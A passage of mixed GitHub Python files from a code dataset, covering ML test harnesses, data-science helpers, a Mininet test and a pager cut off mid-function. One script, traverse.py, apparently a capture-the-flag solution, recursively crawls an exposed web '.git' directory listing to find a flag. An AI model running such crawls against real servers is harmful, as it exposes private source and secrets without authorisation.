precision_recall_results = calculate_precision_recall(radius=params.precision_radius, db_set=db_set, test_set=query_set)\n print(\"finish calculating precision recalls\")\n\n # plot precision vs. recall\n pr_dict = get_precision_vs_recall(test_set=query_set,db_set=db_set,max_hdist=16)\n precision_recall_dict = plot_avg_precision_vs_recall(pr_list=pr_dict,popup=False)\n precision_recall_plot = precision_recall_dict[\"plot\"]\n\n # 4. collect ml_test records\n test_results = {\n \"precision-recall-results\": precision_recall_results, # a dict\n \"precision-vs-recall\":{\n \"precisions\": precision_recall_dict[\"avg_precisions\"],\n \"recalls\": precision_recall_dict[\"avg_recalls\"] # for later plotting precision-recall curve\n }\n }\n test_records = {\n \"precision-recall-curve.jpg\": precision_recall_plot,\n \"db_set\": db_set,\n \"query_set\": query_set\n }\n\n return {\n \"results\":test_results,\n \"records\": test_records\n }\n\n\n# this is a simple wrapper of `ml_test()`\ndef run_simple_test(params,saved_model_path, model_def, save_hash_to=None):\n \"run a test with no cross validation, params should contain `use_specific_code`\"\n # 1. load data\n query_loader, query_fns = _get_data_loader(path=params.test_data_path[\"query\"], params=params,shuffle=False)\n db_loader, db_fns = _get_data_loader(path=params.test_data_path[\"db\"], params=params,shuffle=False)\n # 2. load models\n models = _load_models_from_path(params=params, saved_model_path=saved_model_path,model_def_module=model_def)\n\n # 3. 
run ml_test\n    test_results = testing(params=params, query_data_loader=query_loader, db_data_loader=db_loader,\n models=models,use_specific_code=params.use_specific_code,use_shared_code=params.use_shared_code,model_def=model_def)\n    # save hash code\n    if (save_hash_to is not None):\n assert len(test_results[\"records\"][\"db_set\"]) == len(db_fns)\n assert len(test_results[\"records\"][\"query_set\"]) == len(query_fns)\n _save_hash_code(item_set=test_results[\"records\"][\"db_set\"],fns=db_fns,\n save_to=os.path.join(save_hash_to,\"db.csv\"))\n _save_hash_code(item_set=test_results[\"records\"][\"query_set\"], fns=query_fns,\n save_to=os.path.join(save_hash_to, \"query.csv\"))\n    return test_results\n\n","repo_name":"MarkusZhang/concat-hash","sub_path":"expr_suites/upper_bound/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"42636261753","text":"f=open('top-100.txt','rt')\r\nprint(f.read())\r\nprint(f.readlines()) #contain line\\n, show output as array\r\n#if we use readlines() again,it will show empty array.We need to use f.seek(0) to start from beginning\r\nf.seek(0)\r\nprint(f.readlines())\r\nfor line in f:\r\n print(line.strip())\r\nf.close()\r\n\r\n#open and write file (overwritten)\r\nf=open('test.txt','w')\r\nf.write(\"test line\")\r\nf.close()\r\n#not overwritten file but append text in file\r\nf=open('text.txt','a')\r\nf.write(\"test line2\")\r\nf.close()\r\n\r\nprint(f.name) #text.txt\r\nprint(f.closed) #true\r\nprint(f.mode) #a \r\n\r\nprint(\"----------------\")\r\nwith open('rockyou.txt', encoding='latin-1') as f:\r\n for line in f:\r\n pass","repo_name":"Thanasornsawan/Python-learning","sub_path":"RWfile.py","file_name":"RWfile.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"28799232554","text":"#!/usr/bin/python \n \nfrom mininet.topo import Topo\nfrom mininet.net import Mininet\nfrom mininet.node import RemoteController\nfrom mininet.util import dumpNodeConnections\nfrom mininet.log import setLogLevel\nfrom mininet.cli import CLI\nimport time\nimport sys\n\nclass SingleSwitchTopo(Topo):\n \"Single switch connected to n hosts.\"\n def build(self, n=4):\n switch1 = self.addSwitch('s1')\n h1 = self.addHost('h1')\n self.addLink(switch1, h1)\n switch2 = self.addSwitch('s2')\n h2 = self.addHost('h2')\n self.addLink(switch2, h2)\n switch3 = self.addSwitch('s3')\n h3 = self.addHost('h3')\n self.addLink(switch3, h3)\n switch4 = self.addSwitch('s4')\n h4 = self.addHost('h4')\n self.addLink(switch4, h4)\n\ndef read_input():\n if len(sys.argv) != 3:\n print(\"usage: python {} n remote-ip; where n is the number of hosts and remote-ip the IP of ONOS\".format(sys.argv[0]))\n sys.exit(1)\n return int(sys.argv[1])\n\ndef start(input):\n topo = SingleSwitchTopo(n=input)\n net = Mininet(topo)\n c0 = RemoteController('c0', ip=sys.argv[2], port=6653 )\n net.addController(c0)\n net.start()\n return net\n\ndef simpleTest(net):\n print( \"Dumping host connections\" )\n dumpNodeConnections(net.hosts)\n print( \"Testing network connectivity\" )\n net.pingAll()\n\ndef connTest(net):\n print( \"Testing host connections\" )\n while True:\n net.addHost('h5')\n s4 = net.get('s4')\n net.addLink(s4, net.get('h5'))\n s4.attach('s4-eth3')\n net.get('h5').cmd('ifconfig h5-eth0 10.0.0.5')\n\n # pingall\n net.get('h5').cmd('ping -c 1 10.0.0.1')\n 
net.get('h5').cmd('ping -c 1 10.0.0.2')\n net.get('h5').cmd('ping -c 1 10.0.0.3')\n net.get('h5').cmd('ping -c 1 10.0.0.4')\n \n # delete host\n net.delHost(net.get('h5'))\n \n\ndef stop(net):\n net.stop()\n\nif __name__ == '__main__':\n # Tell mininet to print useful information\n setLogLevel('info')\n n = read_input()\n net = start(n)\n print(\"Sleeping for five seconds...\")\n time.sleep(5)\n simpleTest(net)\n connTest(net)\n net.run(CLI, net)\n","repo_name":"edoardottt/offensive-onos","sub_path":"tests/mininet/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"}
{"seq_id":"40858838876","text":"import re\nimport requests\nfrom init import domain, flag_pattern\n\n\ndir_pattern = r'<td><a href=\"(.+?)\">\1<\/a><\/td>'\n\n\ndef traverse(path):\n response = requests.get(path).text\n if re.search(flag_pattern, response) is not None:\n return re.search(flag_pattern, response).group(0), path\n\n sub_dirs = re.findall(dir_pattern, response)\n for sub_dir in sub_dirs:\n res = traverse(f\"{path}{sub_dir}\")\n if res is not None:\n return res\n return None\n\n\ntest_path = f\"{domain}test/.git/\"\nflag, url = traverse(test_path)\nprint(f\"Flag found at {url}\")\nprint(flag)\n","repo_name":"LOOP115/Plutus","sub_path":"traverse.py","file_name":"traverse.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"70666988625","text":"# Desenvolva um programa que leia seis números inteiros e mostre a soma apenas daqueles que forem pares.\n\nsp = 0\nnp = 0\nni = 0\n\nfor c in range(1, 7):\n n = int(input('Insira o {}° dos 6 números inteiros: '.format(c)))\n if n % 2 == 0:\n sp += n\n np += 1\n\nif np != 0:\n print('\\nA soma dos {} números pares inseridos foi igual a {}'.format(np, sp))\n\nelif np == 0:\n print('\\nNenhum número par foi inserido, logo, a soma dos pares foi igual a 0')","repo_name":"GabrielVitorino28/Python","sub_path":"projetos-basicos/49_soma_de_pares.py","file_name":"49_soma_de_pares.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"8950048193","text":"#Bloom filter\nfrom pybloom import BloomFilter\nfrom random import randrange\nimport numpy.random as nprnd\n\n#### How does it work for a range of numbers?\nf = BloomFilter(capacity=10000, error_rate=0.001)\n[f.add(x) for x in range(10000)]\nsum = 0\nfor i in range(10000):\n #print(i in f)\n sum = sum + (i in f)\nprint(\"Accuracy for range of numbers\",(sum/10000)*100)\n#### How does it work for random numbers?\nf = BloomFilter(capacity=10000, error_rate=0.001)\nrandomNumbers = nprnd.randint(10000000, size=10000)\n[f.add(x) for x in randomNumbers]\nsum = 0\nfor i in range(10000):\n #print(i in f)\n sum = sum + (i in f)\nprint(\"Accuracy for random numbers\",(sum/10000)*100)\n\n\n#Locally sensitive hash function\nfrom lshash import LSHash\nlsh = LSHash(6, 8)\nlsh.index([1,2,3,4,5,6,7,8])\nlsh.query([6.8], num_results=None, distance_func=\"euclidean\")\n","repo_name":"arunkishore/randomScripts","sub_path":"bloomFilter_and_LSH.py","file_name":"bloomFilter_and_LSH.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"25707136800","text":"import os, sys\nsys.path.append(os.path.join(os.path.dirname(__file__)))\n\nfrom pandas import 
DataFrame\nfrom pathlib import Path\nfrom fn import read_data\n\ndef n_rows(file_name: str) -> int:\n \"\"\"Count number of rows in datase\n\n Args:\n file_name (str): name of the data file\n\n Returns:\n rows (int): number of rows in dataset\n \"\"\"\n\n f_path: Path = Path(__file__).parents[2]/\"data\"/file_name\n file: DataFrame = read_data(f_path)\n\n rows: int = len(file)\n\n return rows\n\ndef count_na_by_col(file_name: str) -> DataFrame:\n \"\"\"Count NA values for every column\n\n Args:\n file_name (str): name of the data file\n\n Returns:\n na_count (DataFrame): DataFrame with the count of NA values by column in original dataset\n \"\"\"\n\n f_path: Path = Path(__file__).parents[2]/\"data\"/file_name\n\n print(\"# Reading file...\")\n data: DataFrame = read_data(f_path)\n\n cols: list[str] = list(data.columns)\n\n na_count: DataFrame = DataFrame(\n columns=cols\n )\n\n print(\"# Counting NaN values by col..\")\n for col in cols:\n \n na_count_temp: int = data[col].isna().sum()\n na_count[col] = [na_count_temp]\n\n print(f\"# ...{col}: {na_count_temp} NaN values\")\n\n print(\"-\"*20)\n\n return na_count\n\n\nif __name__ == \"__main__\":\n pass\n # print(count_na_by_col(\"heart.csv\"))\n","repo_name":"SirAymane/Heart-Disease-Dataset","sub_path":"scripts/marc/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4073137289","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ceph', '0005_cephpool_percent_used'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='cephosd',\n name='osd_objectstore',\n field=models.CharField(max_length=15, null=True, editable=False),\n preserve_default=True,\n ),\n ]\n","repo_name":"openattic/openattic","sub_path":"backend/ceph/migrations/0006_cephosd_osd_objectstore.py","file_name":"0006_cephosd_osd_objectstore.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"48"} +{"seq_id":"74537029586","text":"import torch\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pymannkendall as mk\nimport matplotlib as mpl\n\nlabels = {'conv': 'FF', 'rnn': 'RNN', 'reciprocal': 'RGC', 'gru': 'GRU', 'lstm': 'LSTM', 'hgru': 'hGRU',\n 'fgru': 'fGRU', 'gamma': '$\\gamma$-Net'}\n\ncolorseq = [mpl.colors.to_rgb(mpl.colors.TABLEAU_COLORS[k]) for k in mpl.colors.TABLEAU_COLORS]\n\ndef man_kendall_test(values):\n return mk.original_test(values).p\n\ndef plot_imagenet_accs(all_accs, out_file, fdr: float, show = False):\n plt.rcParams.update({\n 'font.size': 15,\n 'figure.figsize': (8, 5),\n 'axes.spines.right': False,\n 'axes.spines.top': False\n })\n plt.figure()\n\n\n for idx, (name, accs) in enumerate(all_accs.items()):\n color = colorseq[idx+1]\n p = man_kendall_test(accs[:8])\n print(f'p-value for {name}: {p}')\n l_name = labels[name] + ' (*)' if p < fdr else labels[name]\n xs = np.arange(1, len(accs) +1, 1)\n plt.plot(xs,accs, label=l_name, color=color)\n\n plt.legend(loc=\"upper left\")\n plt.ylabel('Top1-Accuracy')\n plt.xlabel('Timesteps')\n plt.title(f'Accuracy over time on imagenet')\n plt.savefig('../figures/' + out_file)\n if show:\n plt.show()\n\ndef load_val_file(filename: str):\n # Load RSA results\n saved_state = torch.load(filename)\n acc = saved_state[\"accuracy\"]\n return 
acc\n\n\n\nif __name__ == '__main__':\n all_accs = dict()\n\n all_accs['rnn'] = load_val_file('../results/imagenetval/2023-06-24-02-43_timeseries_rnn-ts7.pt')\n all_accs['reciprocal'] = load_val_file('../results/imagenetval/2023-07-01-20-42_timeseries_reciprocal-ts7.pt')\n all_accs['gru'] = load_val_file('../results/imagenetval/2023-07-01-18-53_timeseries_gru-ts7.pt')\n all_accs['lstm'] = load_val_file('../results/imagenetval/2023-07-01-19-58_timeseries_lstm-ts7.pt')\n all_accs['hgru'] = load_val_file('../results/imagenetval/2023-07-01-22-30_timeseries_hgru-ts7.pt')\n all_accs['fgru'] = load_val_file('../results/imagenetval/2023-07-01-23-11_timeseries_fgru-ts7.pt')\n\n plot_imagenet_accs(all_accs,'../figures/imagenet_trend_test.pdf', 0.00833)\n","repo_name":"simon-birkholz/shape-processing-rnns","sub_path":"experiments/plot_imagenet.py","file_name":"plot_imagenet.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22942524350","text":"#Desafío 4\n#Escribir un programa que cargue una tupla con nombres de especie, y para cada nombre de especie\n#imprima el mensaje Hola soy ......, cuidame.\n#Modificá el programa anterior y dada una posición inicial p y una cantidad n, imprima el mensaje\n#anterior para los n nombres que se encuentran a partir de la posición i.\n\ntupla = ('vaca', 'caballo', 'pato', 'paloma', 'gallina', 'raton', 'puma', 'oso', 'ganzo')\n\nfor i in tupla:\n print(f'Hola soy {i}, cuidame!')\n\n\n\n","repo_name":"MatiasBella/EstructuraDatos","sub_path":"ListaTuplaDiccionarioComplementario/LTD_Desafio4.py","file_name":"LTD_Desafio4.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8337446275","text":"\"\"\"Functions for reducing omics dataset features to improve DRP performance\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\ndef fs_landmark(omics_df):\n \"\"\"Feature Selection method for omics dataframes where feature names contain gene names. 
\n Filters omics dataframe features to only keep features with column names containing landmark genes \n \"\"\"\n\n # create list of landmark genes\n landmark_genes_df = pd.read_csv(\"datasets/landmark_genes_LINCS.txt\",sep='\\t')\n landmark_genes = landmark_genes_df['Symbol']\n # find all phosphosites in landmark genes\n landmark_features = []\n for feature in omics_df.columns:\n for gene in landmark_genes:\n if gene in feature:\n landmark_features.append(feature)\n # remove duplicates\n landmark_features = list(dict.fromkeys(landmark_features))\n\n return landmark_features\n\n\n\ndef fs_landmark_targets(phos_df):\n \"\"\"Feature Selection method for phosphoproteomics dataframes.\n Filters omics dataframe features to only keep phosphorylation sites which are targets of Landmark genes\n \"\"\"\n\n # load ptm relationships dataset and filter for phosphorylation ptms only\n ptm_df = pd.read_csv('datasets/ptm_relationships.csv',index_col=0)\n ptm_df_phos = ptm_df[ptm_df['modification']=='phosphorylation']\n # load landmark genes list\n landmark_genes_df = pd.read_csv(\"datasets/landmark_genes_LINCS.txt\",sep='\\t')\n landmark_genes = landmark_genes_df['Symbol']\n # filter ptms for landmark gene enzymes only\n ptm_df_phos_lm = ptm_df_phos[ptm_df_phos['enzyme_genesymbol'].isin(landmark_genes)]\n # create list of all psites from filtered dataframe\n lm_psites = []\n for ptm in ptm_df_phos_lm.values:\n substrate = ptm[3] \n residue = ptm[4]\n offset = str(ptm[5])\n psite = f'{substrate}({residue+offset});'\n lm_psites.append(psite)\n\n # find all phosphosites in landmark genes\n phosphosites = []\n for phosphosite in phos_df.columns:\n for psite in lm_psites:\n if psite in phosphosite:\n phosphosites.append(phosphosite)\n # remove duplicates\n phosphosites = list(dict.fromkeys(phosphosites))\n\n return phosphosites\n\n\n\ndef fs_functional_score(phos_df,cutoff=90):\n \"\"\"Feature Selection method for phosphoproteomics dataframes.\n Filters omics dataframe features to only keep phosphorylation sites above functional score cutoff from phosphosite functional score dataset\n \"\"\"\n\n # import phosphosites dataset\n psite_df = pd.read_table('datasets/functional_score_psites.tsv')\n\n # filter dataframe by specified cutoff\n perc = cutoff\n print('cutoff percentile: ', perc)\n # finding cutoffs based on percentile of all values in col\n ranking_score = psite_df['functional_score'].to_numpy()\n # set cutoff\n cutoff = np.percentile(ranking_score, perc)\n print('functional score cutoff: ', cutoff)\n # filter dataframe for rows with with cutoff\n psite_df_cutoff = psite_df[psite_df['functional_score'] > cutoff] \n\n # create list of tuples containg gene and ptm position\n gene_pos_tuples = list(zip(psite_df_cutoff['gene'],psite_df_cutoff['position']))\n\n ranked_phosphosites = []\n # create list of all functional ranked ptms from dataset in phospho dataframe columns\n for tuple in gene_pos_tuples:\n gene = tuple[0]\n pos = str(tuple[1])\n # check for any phosphosites that match the conditions\n psites = list(filter(lambda x: gene in x and pos in x,phos_df.columns)) \n if len(psites) > 0:\n ranked_phosphosites.extend(psites)\n\n # remove duplicates\n ranked_phosphosites = list(dict.fromkeys(ranked_phosphosites))\n\n return ranked_phosphosites\n\n\n\ndef fs_atlas_landmark(phos_df,cutoff=90):\n \"\"\"Feature Selection method for phosphoproteomics dataframes.\n Filters omics dataframe features to only keep phosphorylation sites above median percentile \n or promiscuity index cutoff from phosphosite 
substrate specificities dataset and are targets of landmark genes\n \"\"\"\n\n # create list of landmark genes\n landmark_genes_df = pd.read_csv(\"datasets/landmark_genes_LINCS.txt\",sep='\\t')\n landmark_genes = landmark_genes_df['Symbol']\n\n # load substrate specificity dataset filtered for substrate specificities of landmark genes only\n atlas_LM_df = pd.read_csv('datasets/atlas_LM_ptms.csv')\n # remove empty columns\n for col in atlas_LM_df.columns:\n if 'Unnamed:' in col:\n atlas_LM_df.drop(col, axis=1, inplace=True)\n\n phos_df_genes = []\n for col in phos_df.columns:\n phos_df_genes.append(col.split('(')[0])\n # remove duplicates\n phos_df_genes = list(dict.fromkeys(phos_df_genes))\n\n ## uniprot genes mapped to ids for all genes not in substrate specificity dataset\n\n uniprot_mapping_df = pd.read_csv(\"datasets/uniprot.tsv\",sep='\\t')\n swissprot_mapping_df = pd.read_csv(\"datasets/uniprot_swissprot.tsv\",sep='\\t')\n uniprot_all_mapping = pd.concat([uniprot_mapping_df, swissprot_mapping_df], axis=0).reset_index()\n\n # create dictionary\n gene_id_dict = {}\n for ind in uniprot_all_mapping.index:\n gene = uniprot_all_mapping['From'][ind]\n id = uniprot_all_mapping['Entry'][ind]\n gene_id_dict[id] = gene\n\n # find which genes are in substrate specificity dataset using uniprot id\n extra_ids = []\n for id in gene_id_dict:\n if id in atlas_LM_df['Database Uniprot Accession'].to_list():\n extra_ids.append(id)\n\n # filter dataframe for rows using genes appearing either in 'Gene', 'Alternative Gene Names' \n # or 'Protein' column of substrate specificity dataset\n atlas_LM_filtered_gene = atlas_LM_df[(atlas_LM_df['Gene'].isin(phos_df_genes)) | \n (atlas_LM_df['Protein'].isin(phos_df_genes)) | \n (atlas_LM_df['Alternative Gene Names'].isin(phos_df_genes))]\n # filter dataframe for rows with additional genes using uniprot ids\n atlas_LM_filtered_id = atlas_LM_df[atlas_LM_df['Database Uniprot Accession'].isin(extra_ids)]\n # combine into single dataframe\n atlas_LM_filtered = pd.concat([atlas_LM_filtered_gene, atlas_LM_filtered_id], axis=0).reset_index()\n\n\n\n # set cutoff percentile 0-100\n cutoff_perc = cutoff\n # set cutoff type to promiscuity index or median percentile\n cutoff_type = 'median_perc' # set to 'prom_index' or 'median_perc'\n\n print('cutoff percentile: ', cutoff_perc)\n\n if cutoff_type == 'prom_index': # using promiscuity index cutoff\n # calculate cutoff\n ranking_prom_index = atlas_LM_filtered['promiscuity_index'].to_numpy()\n print('promiscuity index cutoff: ', np.percentile(ranking_prom_index, cutoff_perc))\n # filter dataframe\n cutoff = np.percentile(ranking_prom_index, cutoff_perc) # change number to cutoff percentile\n atlas_LM_cutoff = atlas_LM_filtered[atlas_LM_filtered['promiscuity_index'] > cutoff]\n\n elif cutoff_type == 'median_perc': # using median percentile cutoff\n # calculate cutoff\n ranking_median_perc = atlas_LM_filtered['median_percentile'].to_numpy()\n print('median percentile cutoff: ', np.percentile(ranking_median_perc, cutoff_perc))\n # filter dataframe\n cutoff = np.percentile(ranking_median_perc, cutoff_perc) # change number to cutoff percentile\n atlas_LM_cutoff = atlas_LM_filtered[atlas_LM_filtered['median_percentile'] > cutoff] \n\n # create list of gene-phosphosite pairs within substrate specificity dataset filtered by median cutoff\n formatted_phosphosites = []\n for ind in atlas_LM_cutoff.index:\n gene = atlas_LM_cutoff.loc[ind]['Gene']\n phosphosite = atlas_LM_cutoff.loc[ind]['Phosphosite']\n 
formatted_phosphosites.append(f'{gene}({phosphosite});')\n\n    # find all phos_df features containing cutoff phosphosites\n    phosphosites = []\n    for psite in phos_df.columns:\n        for cutoff_psite in formatted_phosphosites:\n            if cutoff_psite in psite:\n                phosphosites.append(psite)\n    # remove duplicates\n    phosphosites = list(dict.fromkeys(phosphosites))\n\n    return phosphosites\n\n\n\n\ndef true_phosphosite_filter(phosphosites):\n    \"\"\"Takes a list of phosphorylation sites and removes false positive phosphosites \n    based on dataset filtered to only contain true positive phosphosites\n    \"\"\"\n\n\n    # import dataset for phosphosite quality control\n    data_path = "datasets/filtered_psites.csv"\n    df = pd.read_csv(data_path,header=2,low_memory=False)\n    true_psites_vals = df[['GENE','Site','MOD_RD']].values\n\n    # create list of true phosphosites formatted for feature selection\n    true_psites = []\n    for psite in true_psites_vals:\n        gene = psite[0]\n        residue = psite[1]\n        offset = psite[2]\n        # add to list\n        true_psites.append(f'{gene}({residue}{offset});')\n    \n    # keep phosphosites from feature selection that match a true phosphosite\n    filtered_phosphosites = []\n    for psite in phosphosites:\n        res = any(ele in psite for ele in true_psites)\n        if res:\n            filtered_phosphosites.append(psite)\n    \n    return filtered_phosphosites","repo_name":"Nasim-MI/DRP-MSc-project","sub_path":"scripts/feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":9260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26149205957","text":"import pytest\nfrom datetime import datetime\nimport numpy as np\n\nfrom numpy_solution import group_adjust\n\n\ndef test_three_groups():\n    vals = [1, 2, 3, 8, 5]\n    grps_1 = ['USA', 'USA', 'USA', 'USA', 'USA']\n    grps_2 = ['MA', 'MA', 'MA', 'RI', 'RI']\n    grps_3 = ['WEYMOUTH', 'BOSTON', 'BOSTON', 'PROVIDENCE', 'PROVIDENCE']\n    weights = [.15, .35, .5]\n\n    adj_vals = group_adjust(vals, [grps_1, grps_2, grps_3], weights)\n    # 1 - (USA_mean*.15 + MA_mean * .35 + WEYMOUTH_mean * .5)\n    # 2 - (USA_mean*.15 + MA_mean * .35 + BOSTON_mean * .5)\n    # 3 - (USA_mean*.15 + MA_mean * .35 + BOSTON_mean * .5)\n    # etc ...\n    # Plug in the numbers ...\n    # 1 - (.15 * 3.8 + .35 * 2.0 + .5 * 1.0) = -0.770\n    # 2 - (.15 * 3.8 + .35 * 2.0 + .5 * 2.5) = -0.520\n    # 3 - (.15 * 3.8 + .35 * 2.0 + .5 * 2.5) = 0.480\n    # etc...\n\n    answer = [-0.770, -0.520, 0.480, 1.905, -1.095]\n    for ans, res in zip(answer, adj_vals):\n        assert abs(ans - res) < 1e-5\n\n\ndef test_two_groups():\n    vals = [1, 2, 3, 8, 5]\n    grps_1 = ['USA', 'USA', 'USA', 'USA', 'USA']\n    grps_2 = ['MA', 'RI', 'CT', 'CT', 'CT']\n    weights = [.65, .35]\n\n    adj_vals = group_adjust(vals, [grps_1, grps_2], weights)\n    # 1 - (.65 * 3.8 + .35 * 1.0) = -1.82\n    # 2 - (.65 * 3.8 + .35 * 2.0) = -1.17\n    # 3 - (.65 * 3.8 + .35 * 5.33333) = -1.33666\n    answer = [-1.82, -1.17, -1.33666, 3.66333, 0.66333]\n    for ans, res in zip(answer, adj_vals):\n        assert abs(ans - res) < 1e-5\n\n\ndef test_missing_vals():\n    # If you're using NumPy or Pandas, use np.NaN\n    # If you're writing python, use None\n    vals = [1, np.NaN, 3, 5, 8, 7]\n    #vals = [1, None, 3, 5, 8, 7]\n    grps_1 = ['USA', 'USA', 'USA', 'USA', 'USA', 'USA']\n    grps_2 = ['MA', 'RI', 'RI', 'CT', 'CT', 'CT']\n    weights = [.65, .35]\n\n    adj_vals = group_adjust(vals, [grps_1, grps_2], weights)\n\n    # This should be None or np.NaN depending on your implementation\n    # please feel free to change this line to match yours\n    
answer = [-2.47, np.NaN, -1.170, -0.4533333, 2.54666666, 1.54666666]\n    #answer = [-2.47, None, -1.170, -0.4533333, 2.54666666, 1.54666666]\n\n    for ans, res in zip(answer, adj_vals):\n        if ans is None:\n            assert res is None\n        elif np.isnan(ans):\n            assert np.isnan(res)\n        else:\n            assert abs(ans - res) < 1e-5\n\n\ndef test_weights_len_equals_group_len():\n    # Need to have 1 weight for each group\n\n    # vals = [1, np.NaN, 3, 5, 8, 7]\n    vals = [1, None, 3, 5, 8, 7]\n    grps_1 = ['USA', 'USA', 'USA', 'USA', 'USA', 'USA']\n    grps_2 = ['MA', 'RI', 'RI', 'CT', 'CT', 'CT']\n    weights = [.65]\n\n    with pytest.raises(ValueError):\n        group_adjust(vals, [grps_1, grps_2], weights)\n    pass\n\n\ndef test_group_len_equals_vals_len():\n    # The groups need to be same shape as vals\n    vals = [1, None, 3, 5, 8, 7]\n    grps_1 = ['USA']\n    grps_2 = ['MA', 'RI', 'RI', 'CT', 'CT', 'CT']\n    weights = [.65]\n\n    with pytest.raises(ValueError):\n        group_adjust(vals, [grps_1, grps_2], weights)\n    pass\n\n\ndef test_performance():\n    #vals = 1000000*[1, None, 3, 5, 8, 7]\n    # If you're doing numpy, use the np.NaN instead\n    vals = 1000000 * [1, np.NaN, 3, 5, 8, 7]\n    grps_1 = 1000000 * [1, 1, 1, 1, 1, 1]\n    grps_2 = 1000000 * [1, 1, 1, 1, 2, 2]\n    grps_3 = 1000000 * [1, 2, 2, 3, 4, 5]\n    weights = [.20, .30, .50]\n\n    start = datetime.now()\n    group_adjust(vals, [grps_1, grps_2, grps_3], weights)\n    end = datetime.now()\n    diff = end - start\n    print(diff)\n    pass\n","repo_name":"acondliffe1/group-adjust","sub_path":"unit_test.py","file_name":"unit_test.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35476964023","text":"# input : num = [2,7,11,15]\n#target : 9\n# output : [0,1] (list)\n\n# Brute force (exhaustive search, complete matching)\n\ndef twoSum(nums, target):\n    for i, n in enumerate(nums):\n        complement = target - n\n\n        if complement in nums[i + 1:]:\n            # index of n, plus the complement's index in the remaining slice (offset by i + 1)\n            return [nums.index(n), nums[i + 1:].index(complement) + (i + 1)]","repo_name":"woohyun1031/Algorithm","sub_path":"python/d_0115/twoSum.py","file_name":"twoSum.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36484812723","text":"import logging\n\n__version__ = '0.3'\n\n\nclass ZPMException(Exception):\n    \"\"\"\n    Basic exception to signal ZPM-specific errors. 
Useful for cases in which an\n exception must be differentiated from the more general built-in exception\n types.\n \"\"\"\n\n\ndef get_logger(name):\n log = logging.getLogger(name)\n _stream_handler = logging.StreamHandler()\n _stream_handler.setFormatter(\n logging.Formatter(fmt='%(levelname)s:%(name)s: %(message)s')\n )\n log.addHandler(_stream_handler)\n return log\n\nLOG_LEVEL_MAP = dict(\n debug=logging.DEBUG,\n info=logging.INFO,\n warning=logging.WARNING,\n error=logging.ERROR,\n critical=logging.CRITICAL,\n)\n","repo_name":"larsbutler/zerovm-cli","sub_path":"zpmlib/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"27203836742","text":"import json\nimport os\n\nfrom matplotlib import pyplot as plt\n\nfrom angorapy.common.const import PATH_TO_EXPERIMENTS, QUALITATIVE_COLOR_PALETTE\n\nexperiment_ids = ['1653053413', '1655284851', '1654708464']\n\nreward_developments = {}\nfor id in experiment_ids:\n with open(os.path.join(\"../../../\", PATH_TO_EXPERIMENTS, str(id), \"meta.json\")) as f:\n meta = json.load(f)\n with open(os.path.join(\"../../../\", PATH_TO_EXPERIMENTS, str(id), \"progress.json\")) as f:\n progress = json.load(f)\n\n exp_name = meta[\"hyperparameters\"][\"distribution\"]\n reward_developments[exp_name] = progress[\"rewards\"][\"mean\"]\n\nfor i, (name, rewards) in enumerate(reward_developments.items()):\n plt.plot(rewards[:800], label=name, color=QUALITATIVE_COLOR_PALETTE[i])\n\nplt.title(\"In-Hand Object Manipulation\")\nplt.xlabel(\"Cycle\")\nplt.ylabel(\"Avg. Episode Return\")\nplt.legend()\n\nplt.xlim(0, 800)\nplt.ylim(0)\n\nplt.gcf().set_size_inches(16, 4)\nplt.show()\n# plt.savefig(\"../../../docs/figures/manipulate-progress.pdf\", format=\"pdf\", bbox_inches=\"tight\")","repo_name":"ccnmaastricht/angorapy","sub_path":"angorapy/analysis/plotting/plot_experiment_comparison.py","file_name":"plot_experiment_comparison.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"43680196885","text":"\"\"\"\nSplit and interactively page a string (stdin, for stream\nredirection) or file of text\n\"\"\"\n\nimport sys\n\nOKBLUE = '\\033[94m'\nENDC = '\\033[0m'\n\ndef getreply():\n \"\"\"\n read a reply key from an interactive user\n even if stdin redirected to a file or pipe\n \"\"\"\n inputstr = f'{OKBLUE}More?{ENDC}'\n if sys.stdin.isatty():\n return input(inputstr).encode()\n else:\n if sys.platform[:3] == 'win':\n import msvcrt\n for ch in inputstr:\n 